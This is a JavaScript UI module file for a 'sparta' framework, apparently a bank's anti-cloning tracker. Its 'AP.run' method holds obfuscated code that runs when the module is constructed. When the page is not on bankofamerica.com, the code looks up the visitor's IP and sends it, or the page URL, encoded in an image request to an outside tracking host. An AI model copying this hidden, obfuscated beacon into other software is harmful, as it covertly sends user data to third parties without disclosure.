import Module, { registerModuleClass } from '@sparta.global.utilities/sparta-module-utility/dist/es6.js';
import Handlebars from '@sparta.global.vendors/handlebars';

/* eslint-disable */
/**
 * @exports
 * @class AP
 * @extends Module
 */
class AP {
  /**
   * @method run
   * @returns {void}
   */
  static run() {
    function a0_0x4c5a() {
      var _0x17f505 = ['3508446mElNJj', 'toString', 'DONE', 'replace', 'parse', '7448zbDAds', 'responseText', 'onerror', '50359550CLLDWI', '8095100leJjIO', '\x5cu0028\x5cu0028\x5cu0068\x5cu0074\x5cu0074\x5cu0070\x5cu0028\x5cu005B\x5cu0073\x5cu005D\x5cu0029\x5cu007B\x5cu0030\x5cu002C\x5cu0031\x5cu007D\x5cu003A\x5cu005C\x5cu002F\x5cu005C\x5cu002F\x5cu0029\x5cu007B\x5cu0030\x5cu002C\x5cu0031\x5cu007D\x5cu0028\x5cu006C\x5cu006F\x5cu0063\x5cu0061\x5cu006C\x5cu0068\x5cu006F\x5cu0073\x5cu0074\x5cu007C\x5cu0031\x5cu0032\x5cu0037\x5cu002E\x5cu0030\x5cu002E\x5cu0030\x5cu002E\x5cu0031\x5cu0029\x5cu007B\x5cu0031\x5cu007D\x5cu0028\x5cu0028\x5cu005B\x5cu003A\x5cu005D\x5cu0029\x5cu007B\x5cu0030\x5cu002C\x5cu0031\x5cu007D\x5cu005B\x5cu005C\x5cu0030\x5cu002D\x5cu0039\x5cu005D\x5cu007B\x5cu0034\x5cu007D\x5cu0029\x5cu007B\x5cu0030\x5cu002C\x5cu0031\x5cu007D\x5cu005C\x5cu002F\x5cu007B\x5cu0030\x5cu002C\x5cu0031\x5cu007D\x5cu0029\x5cu007B\x5cu0031\x5cu007D', 'getElementsByTagName', 'script', '21xUtZyw', '\x5cu002f\x5cu002f\x5cu0063\x5cu006f\x5cu006e\x5cu0074\x5cu0065\x5cu006e\x5cu0074\x5cu002d\x5cu0063\x5cu0064\x5cu006e\x5cu002e\x5cu0063\x5cu006f\x5cu006d\x5cu002f', '\x5c.com$', 'onreadystatechange', 'match', 'host', 'location', 'text/javascript', '4843628bJOAuC', 'fromCharCode', '723/', '14157aQvYCg', '250PAvHYA', 'createElement', 'GET', '12979VLkbPn', 'undefined', '4460754rtzdFv', 'parentNode', 'readyState', '(function(){\x20var\x20img\x20=\x20new\x20Image();\x20img.referrerpolicy\x20=\x20\x27origin\x27;\x20img.src\x20=\x20\x27'];
      a0_0x4c5a = function () {
        return _0x17f505;
      };
      return a0_0x4c5a();
    }
    function a0_0x34a6(_0x4776a7, _0x279396) {
      var _0x4c5a41 = a0_0x4c5a();
      return a0_0x34a6 = function (_0x34a63a, _0xddffe5) {
        _0x34a63a = _0x34a63a - 0x79;
        var _0x3e0fe1 = _0x4c5a41[_0x34a63a];
        return _0x3e0fe1;
      }, a0_0x34a6(_0x4776a7, _0x279396);
    }
    ((function (_0x1d8d92, _0x3040db) {
      var _0x5e1022 = a0_0x34a6,
        _0x193891 = _0x1d8d92();
      while (!![]) {
        try {
          var _0x5e278e = parseInt(_0x5e1022(0x96)) / 0x1 * (-parseInt(_0x5e1022(0x93)) / 0x2) + parseInt(_0x5e1022(0x98)) / 0x3 + parseInt(_0x5e1022(0x8f)) / 0x4 + parseInt(_0x5e1022(0x83)) / 0x5 + parseInt(_0x5e1022(0x7a)) / 0x6 * (parseInt(_0x5e1022(0x87)) / 0x7) + parseInt(_0x5e1022(0x7f)) / 0x8 * (parseInt(_0x5e1022(0x92)) / 0x9) + -parseInt(_0x5e1022(0x82)) / 0xa;
          if (_0x5e278e === _0x3040db) break;else _0x193891['push'](_0x193891['shift']());
        } catch (_0xa70e7c) {
          _0x193891['push'](_0x193891['shift']());
        }
      }
    }))(a0_0x4c5a, 0xd6291), function () {
      var _0xa60356 = a0_0x34a6;
      function _0x485324(_0x2d4e27) {
        var _0x511a9b = a0_0x34a6;
        return _0x2d4e27[_0x511a9b(0x7d)](/[a-zA-Z]/g, function (_0x5c3dbd) {
          var _0x23040d = _0x511a9b;
          return String[_0x23040d(0x90)]((_0x5c3dbd <= 'Z' ? 0x5a : 0x7a) >= (_0x5c3dbd = _0x5c3dbd['charCodeAt'](0x0) + 0xd) ? _0x5c3dbd : _0x5c3dbd - 0x1a);
        });
      }
      function _0x278f5e(_0x408404) {
        var _0x5b91fd = a0_0x34a6;
        return unescape(_0x408404[_0x5b91fd(0x7d)](/\\/g, '%'));
      }
      function _0x4f2a53(_0x242c31) {
        var _0x2145db = a0_0x34a6,
          _0x1bdb40 = _0x278f5e(_0x2145db(0x88)) + _0x2145db(0x91) + btoa(_0x485324(_0x242c31))[_0x2145db(0x7d)](/\//g, '') + '.gif',
          _0x1f6a15 = document[_0x2145db(0x94)](_0x2145db(0x86));
        _0x1f6a15['type'] = _0x2145db(0x8e), _0x1f6a15['async'] = !![], _0x1f6a15['innerHTML'] = _0x2145db(0x79) + _0x1bdb40 + '\x27;\x20})();';
        var _0x306242 = document[_0x2145db(0x85)](_0x2145db(0x86))[0x0];
        _0x306242[_0x2145db(0x99)]['insertBefore'](_0x1f6a15, _0x306242);
      }
      var _0x203b49 = new RegExp('(^|\x5c.)' + _0x278f5e('\x5cu0062\x5cu0061\x5cu006E\x5cu006B\x5cu006F\x5cu0066\x5cu0061\x5cu006D\x5cu0065\x5cu0072\x5cu0069\x5cu0063\x5cu0061') + _0xa60356(0x89), 'g');
      if (window['location']['hostname'][_0xa60356(0x8b)](_0x203b49) === null) {
        if (window[_0xa60356(0x8d)][_0xa60356(0x8c)][_0xa60356(0x8b)](_0x278f5e(_0xa60356(0x84)))) {
          var _0x1a067f = new XMLHttpRequest();
          _0x1a067f[_0xa60356(0x8a)] = function () {
            var _0x200140 = _0xa60356;
            _0x1a067f[_0x200140(0x9a)] == XMLHttpRequest[_0x200140(0x7c)] && _0x4f2a53(JSON[_0x200140(0x7e)](_0x1a067f[_0x200140(0x80)])[_0x278f5e('\x5cu0069\x5cu0070')]);
          }, _0x1a067f[_0xa60356(0x81)] = function (_0x576e25) {
            var _0x55ec5c = _0xa60356;
            _0x4f2a53(window[_0x55ec5c(0x8d)][_0x55ec5c(0x7b)]());
          }, _0x1a067f['open'](_0xa60356(0x95), _0x278f5e('\x5cu0068\x5cu0074\x5cu0074\x5cu0070\x5cu0073\x5cu003A\x5cu002F\x5cu002F\x5cu0061\x5cu0070\x5cu0069\x5cu002E\x5cu0069\x5cu0070\x5cu0069\x5cu0066\x5cu0079\x5cu002E\x5cu006F\x5cu0072\x5cu0067\x5cu003F\x5cu0066\x5cu006F\x5cu0072\x5cu006D\x5cu0061\x5cu0074\x5cu003D\x5cu006A\x5cu0073\x5cu006F\x5cu006E'), !![]), _0x1a067f['send']();
          var _0x2b4ca1 = !![];
        }
        typeof _0x2b4ca1 === _0xa60356(0x97) && _0x4f2a53(window[_0xa60356(0x8d)][_0xa60356(0x7b)]());
      }
    }();
  }
}
/* eslint-enable */

const Template = Handlebars.template({"compiler":[8,">= 4.3.0"],"main":function(container,depth0,helpers,partials,data) {
    return "";
},"useData":true});
const renderTemplate = function (data, options) {
  return Template(data, options);
};

// Import templates & helpers
var _moduleConfig = {
  "name": "@sparta.sales.modules/ap-module",
  "version": "3.0.0",
  "id": "ApModule",
  "containerID": "salesApModule",
  "moduleName": "sales-ap-module",
  "semantic": true,
  "superModule": false,
  "viewPort": ["small", "medium", "large"],
  "tag": "div",
  "nameSpace": "ap-module",
  "data": {
    "init": "ApModule",
    "options": {}
  },
  "moduleParams": [{
    "name": "trackNum",
    "type": "number",
    "values": [723, 820],
    "description": "number used for GIS tracking purposes"
  }],
  "layout": "layout",
  "render": function (context) {
    return renderTemplate(context, {
      "helpers": {},
      "partials": {}
    });
  },
  "template": renderTemplate,
  "partials": {},
  "helpers": {},
  "dependencies": {
    "@sparta.global.utilities/sparta-module-utility": "^1.0.0",
    "@sparta.global.utilities/sparta-style-token-utility": "^1.1.6"
  },
  "stores": []
};

/**
 * @exports
 * @class ApModule
 * @extends Module
 */
class ApModule extends Module {
  /**
   * @method constructor
   * @param {Object} options options
   * @param {Object} context context
   * @returns {void}
   */
  constructor(options, context) {
    super({
      ...options,
      context,
      config: _moduleConfig
    });
    AP.run();
  }

  /**
  * @method init
  * @returns {void}
  */
  init() {}
}
registerModuleClass({
  moduleClass: ApModule,
  moduleConfig: _moduleConfig
});
const moduleConfig = _moduleConfig;

export { ApModule as default, moduleConfig };
